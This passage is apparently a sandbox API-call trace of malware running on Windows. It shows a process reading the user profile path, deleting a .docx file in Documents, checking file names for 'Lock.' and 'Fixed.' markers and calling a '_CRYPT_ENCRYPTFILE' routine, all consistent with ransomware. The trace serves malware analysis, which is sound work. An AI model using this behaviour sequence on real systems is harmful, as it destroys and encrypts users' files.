dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.027] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.027] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0265.028] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kZP09G.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx", lpFilePart=0x8cedf4*="kZP09G.docx") returned 0x25 [0265.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.029] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kzp09g.docx")) returned 0x20 [0265.029] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a307f0, ftCreationTime.dwHighDateTime=0x1d58c15, ftLastAccessTime.dwLowDateTime=0x6ea54c0, ftLastAccessTime.dwHighDateTime=0x1d59407, ftLastWriteTime.dwLowDateTime=0x6ea54c0, ftLastWriteTime.dwHighDateTime=0x1d59407, nFileSizeHigh=0x0, nFileSizeLow=0x5c4b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="kZP09G.docx", cAlternateFileName="KZP09G~1.DOC")) returned 0xa870d0 [0265.030] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kzp09g.docx")) returned 1 [0265.036] FindNextFileW (in: hFindFile=0xa870d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a307f0, ftCreationTime.dwHighDateTime=0x1d58c15, ftLastAccessTime.dwLowDateTime=0x6ea54c0, ftLastAccessTime.dwHighDateTime=0x1d59407, ftLastWriteTime.dwLowDateTime=0x6ea54c0, ftLastWriteTime.dwHighDateTime=0x1d59407, nFileSizeHigh=0x0, nFileSizeLow=0x5c4b, dwReserved0=0x1, dwReserved1=0x1c, cFileName="kZP09G.docx", cAlternateFileName="KZP09G~1.DOC")) returned 0 [0265.036] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0265.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.036] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.037] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e558d8 [0265.038] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/kZP09G.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx", lpFilePart=0x8cf650*="kZP09G.docx") returned 0x25 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.038] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\kZP09G.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kzp09g.docx")) returned 0xffffffff [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.038] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.038] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.038] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L7MGGQIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7MGGQIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MGGQIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GGQIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GQIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IaJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.039] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0265.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e79310 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L7MGGQIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7MGGQIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MGGQIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GGQIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GQIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IaJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0265.041] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.041] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0265.041] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0265.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0265.046] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0265.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0265.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0265.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0265.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 